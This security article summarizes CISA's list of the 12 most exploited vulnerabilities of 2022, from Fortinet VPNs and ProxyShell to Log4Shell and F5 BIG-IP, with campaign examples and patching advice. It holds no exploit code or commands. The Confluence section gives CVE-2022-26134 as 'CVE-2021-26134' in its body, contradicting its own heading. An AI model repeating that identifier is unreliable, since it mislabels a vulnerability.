The 12 Most Frequently Exploited Vulnerabilities in 2022

Exploiting known and unpatched vulnerabilities continues to be a common tactic used by threat actors. From security bypasses and credential exposure to remote code execution, software vulnerabilities have always been a powerful weapon for cyber attackers to compromise systems.

While some new figures have appeared in this year's disruptions, such as new vulnerabilities discovered in Active Directory and MOVEit file transfer applications, and those used in the AlienFox toolkit or IceFire ransomware campaigns, some of the known vulnerabilities have remained strong in terms of frequency of abuse so far.

In this article, we dive into CISA's newly released list of the 12 most frequently exploited vulnerabilities in 2022 that will continue to pose a significant threat to enterprise business.

1. Fortinet FortiOS & FortiProxy (CVE-2018-13379)

Fortinet FortiOS SSL VPNs are primarily used in border firewalls and function by isolating sensitive internal networks from the public Internet. CVE-2018-13379 serves as a particularly severe path traversal vulnerability that allows APT participants to use specially crafted HTTP resource requests to steal legitimate credentials, connect to an unpatched VPN and download system files. Despite the release of a patch back in 2019, CVE-2018-13379 has made several comebacks over the past three years, targeting government, commercial, and technical service networks, among others.

In 2020, a hacker exploited the vulnerability to steal VPN credentials from nearly 50,000 Fortinet VPN devices. Security researchers noted at the time that more than 40 of those 50,000 domains belonged to well-known financial and government organizations. Later that year, the vulnerability reappeared. This time it was exploited by government-backed actors in an attempt to disrupt U.S. election support systems. During this campaign, CVE-2018-13379 was linked to other attacks to exploit servers exposed to the Internet and gain access. The vulnerability reappeared in 2021 when 87,000 sets of credentials for Fortigate SSL VPN devices obtained through the exploitation of CVE-2018-13379 were leaked online.

These critical vulnerabilities remain lucrative for threat actors. The larger the user base, the more potential targets there are, which increases the appeal to attackers. Due to their frequent abuse, the FBI and CISA have issued a joint advisory warning Fortinet users and administrators to beware of Advanced Persistent Threat (APT) attackers actively exploiting existing and future critical VPN vulnerabilities. It is highly likely that these vulnerabilities will continue to be used to gain an initial foothold in vulnerable environments as a springboard for future attacks.

2-4. Microsoft Exchange Server (CVE-2021-34473, CVE-2021-31207, CVE-2021-34523)

Microsoft Exchange Server is a popular email and support system for global organizations, deployed both locally and in the cloud. To this day, a series of vulnerabilities found in unpatched local versions of Microsoft Exchange Server continue to be actively exploited on Internet-facing servers.

This series of vulnerabilities, collectively referred to as "ProxyShell," includes CVE-2021-34473, CVE-2021-31207, and CVE-2021-34523, and affects multiple versions of local Microsoft Exchange Server. ProxyShell targets unpatched Exchange servers to enable pre-authenticated Remote Code Execution (RCE). Of the three vulnerabilities, CVE-2021-34473 has the highest CVSS score of 9.1, and while the remaining vulnerabilities were initially categorized as "exploitation less likely" when used in conjunction with CVE-2021-34473, they provide significant value to attackers. In short, ProxyShell allows an attacker to execute arbitrary commands on a vulnerable Exchange server on port 443.

All three vulnerabilities were patched in 2021, but security researchers are currently tracking several uncategorized threat (UNC) organizations known to be exploiting the ProxyShell vulnerability, while predicting additional clusters to emerge as future generations of threat actors adopt valid vulnerabilities. In one particular cluster of threat activity tracked as UNC2980, Mandiant researchers observed that the ProxyShell vulnerability was used in a cyber espionage campaign. In this operation, UNC2980 dropped multiple tools into the U.S. university's system environment after gaining access and deploying a web shell by utilizing ProxyShell. After conducting an attack via ProxyShell, the attackers used publicly available tools (e.g., Mimikatz, HTRAN, and EarthWorm) to conduct post-attack activities.

5. Microsoft Various Products (CVE-2022-30190)

CVE-2022-30190, known as "Follina", is a critical RCE vulnerability that affects multiple Microsoft Office products. Follina allows an attacker to execute arbitrary code after convincing a user to open a malicious Word document or any other vector that handles URLs. Due to the large number of unpatched Microsoft Office products available, Follina continues to appear in various cyberattacks.

Known threat actors exploit the Follina vulnerability through phishing scams that use social engineering techniques to trick users into opening malicious Office documents. When a user encounters embedded links within Office applications, these links are automatically fetched, triggering the execution of the Microsoft Support Diagnostic Tool (MSDT) protocol, a Microsoft service that is primarily used to collect system crash information for reporting to Microsoft Support. However, threat actors can exploit this protocol by crafting links to enforce the execution of malicious PowerShell commands without any further user interaction. This poses a serious security risk as it allows attackers to remotely execute unauthorized commands on the target system via seemingly innocuous links.

Recently, the Follina vulnerability has been used as a zero-day exploit to support threat campaigns against key industry organizations. From March through May 2022, an active cluster tracked as UNC3658 used Follina to attack the Philippine government. In April of the same year, more Follina samples appeared in the UNC3347 campaign targeting telecom entities and business services in South Asia. A third cluster named UNC3819 also used CVE-2022-30190 to attack organizations in Russia and Belarus.

6. Zoho ManageEngine ADSelfService Plus (CVE-2021-40539)

A patched critical vulnerability in the Zoho ManageEngine ADSelfService Plus software in late 2021 led to attacks on at least nine entities in the defense, healthcare, energy, technology and education sectors. The product is said to provide a comprehensive self-service password management and single sign-on (SSO) solution for Active Directory and cloud applications, designed to allow administrators to enforce two-factor authentication (2FA) for secure application logins while granting users the ability to reset their passwords on their own.

The vulnerability, tracked as CVE-2021-40539, allows threat actors to gain initial access to a victim organization's system.CVE-2021-40539 (CVSS score 9.8) is an authentication bypass vulnerability that affects REST API URLs that can be used for RCE.

In response, CISA issued an alert about the zero-day vulnerability, informing users how attackers could exploit the vulnerability to deploy web shells for post-exploitation activities such as stealing administrator credentials, performing lateral moves, and leaking registry and Active Directory (AD) files. The vulnerabilities are particularly acute in SSO solutions for AD and cloud applications. If these vulnerabilities are successfully exploited, attackers can essentially access critical applications, sensitive data, and other areas deep within the corporate network via AD.

Vulnerabilities exploiting CVE-2021-40539 were also recently discovered in an attack against the International Committee of the Red Cross (ICRC). In a statement, the ICRC acknowledged that they missed critical patches that could have protected them from the attack, emphasizing the importance of maintaining a robust patch management process. As a result of the attack, the names, locations and contact information of more than 515,000 people involved in the ICRC's Restoring Family Links program were compromised.

7–8. Atlassian Confluence Server & Data Center (CVE-2021-26084, CVE-2022-26134)

Atlassian Confluence, a collaboration and documentation platform used by many government and private sector organizations, is also highly favored by threat actors. The two shortlisted vulnerabilities, CVE-2021-26084 and CVE-2022-26134, are both related to Object Graph Navigation Language (OGNL) injection.

The first large-scale exploitation of CVE-2021-26084 occurred in September 2021 and targeted the popular web-based document service. The Confluence platform is designed to allow multiple teams to collaborate on shared projects. A malicious actor could use the command injection vulnerability CVE-2021-26084 to execute arbitrary code on a Confluence server or data center instance. Attackers essentially have the same privileges as the user running the service, and are therefore able to execute any command, gain elevated administrative privileges, and establish a foothold in the environment. CISA issued an advisory directing users and administrators to check for updates to Atlassian to prevent compromise.

Just nine months later, Atlassian released another OGNL injection vulnerability against Confluence servers and data centers. Tracked as CVE-2021-26134, the vulnerability allows an unauthenticated attacker to execute arbitrary code in all supported Confluence data center and server versions. After a Proof of Concept (PoC) was released within a week of the initial disclosure, this critical level vulnerability quickly became one of the most exploited. In this case, CVE-2021-26134 was used to implement an unauthenticated RCE on a server and then cast a Behinder web shell. The Behinder web shell empowers malicious actors with very powerful features, such as interaction with Meterpreter and Cobalt Strike and a memory-only web shell.

According to Atlassian's website, the company supports 83 percent of Fortune 500 companies, has 10 million active users per month, and has more than 235,000 users in more than 190 countries. These two Atlassian-based CVEs demonstrate how financially motivated threat actors continue to exploit vulnerabilities to attack many attractive targets simultaneously.

9. Log4Shell (CVE-2021-44228)

Log4shell, tracked as CVE-2021-44228 and also known as the "Log4j vulnerability", is the most serious RCE vulnerability found in Apache Log4j, a popular java-based logging library widely used in various applications. The vulnerability allows a remote attacker to execute arbitrary code on an affected system, which could lead to unauthorized access, data disclosure, or even compromise the entire system.

The vulnerability, which was first publicly disclosed in December 2021, is due to the use of untrusted data in the lookup mechanism of the "log4j2" component, which allows an attacker to inject malicious code via crafted log messages. This flaw exposed a wide variety of applications, including web servers, enterprise software, and cloud-based services that rely on Log4j for logging.

Although Apache quickly released a patch for the Level 10.0 RCE vulnerability, security experts confirmed that given its widespread use among major vendors, the exploit would continue and could lead to widespread malware deployment. CISA has since issued a Binding Operational Directive (BOD) ordering Federal Civilian Executive Branch (FCEB) agencies to patch their systems to address this critical vulnerability.

The rapid exploitation of Log4shell is attributed to its widespread deployment across different industries and platforms. What's more, patching the vulnerability has proven extremely challenging as many organizations struggle to identify and update all instances of Log4j in their infrastructure in a timely manner.

10–11. VMware Workspace ONE Access & Identity Manager (CVE-2022-22954, CVE-2022-22960)

VMware is a popular virtualization software that often falls prey to cyber attackers at all levels, including APT groups. Exploiting vulnerabilities in VMware can authorize unauthorized access to virtual machines and critical data hosted on the platform. Because VMware virtualizes multiple systems on a single physical server, a successful attack could compromise multiple virtual machines at once. Typically, attackers choose to target VMware environments in order to gain a foothold in a larger network, leveraging the trust and accessibility of virtualized infrastructure. The VMware vulnerability took two spots on CISA's vulnerability list this year.

First, CVE-2022-22954 (CVSS score 9.8) is a server-side template injection vulnerability that can be triggered by a malicious actor with network access to implement RCE in VMware's Workspace ONE access & Identity Manager. After the PoC for the vulnerability was released last spring, security researchers discovered that it was being used in an active attack to infect servers with mining machines.

Second, CVE-2022-22960 is a privilege escalation vulnerability. According to the CISA advisory on this vulnerability, it enables a malicious actor with local access to escalate privileges to root due to incorrect permissions in the support script. If linked with CVE-2022-22954, an attacker could execute arbitrary shell commands as a VMware user, then wipe the logs, escalate privileges, and move laterally to another system with root access.

12. F5 Networks BIG-IP (CVE-2022-1388)

Last September, F5 released a patch for a critical RCE vulnerability related to the BIG-IP product suite, and a few days later, security researchers were able to create an exploit for the vulnerability.

CVE-2022-1388 (CVSS score 9.8) is categorized as a missing authentication vulnerability involving an iControl REST authentication bypass, which could lead to an attacker gaining access and taking control of a compromised BIG-IP system. An attacker could perform many malicious actions such as loading a web shell for future attacks, deploying cryptocurrency miners and leaking sensitive data.

Remote code execution flaws are easy to exploit, which makes them a target for opportunistic threat actors. Whenever vulnerabilities are discovered in Internet-facing services, threat actors are sure to be quick to exploit them. Vulnerabilities like CVE-2022-1388 provide immediate initial access to the target network and often enable attackers to conduct attacks through lateral movement and privilege escalation.

Conclusion

Enterprise security teams must recognize that older vulnerabilities still exist and continue to pose a significant threat. While the latest CVEs are often more visible, CISA's annual list of commonly used vulnerabilities is a clear reminder that known vulnerabilities can still wreak havoc on vulnerable systems.

In addition to the comprehensive list, CISA provides guidance for vendors and technology organizations to identify and mitigate potential risks. Recommendations include adopting secure-by-design practices and prioritizing the patching of known exploited vulnerabilities to minimize the risk of compromise. Vendors are also encouraged to establish a coordinated vulnerability disclosure process to allow for root cause analysis of discovered vulnerabilities.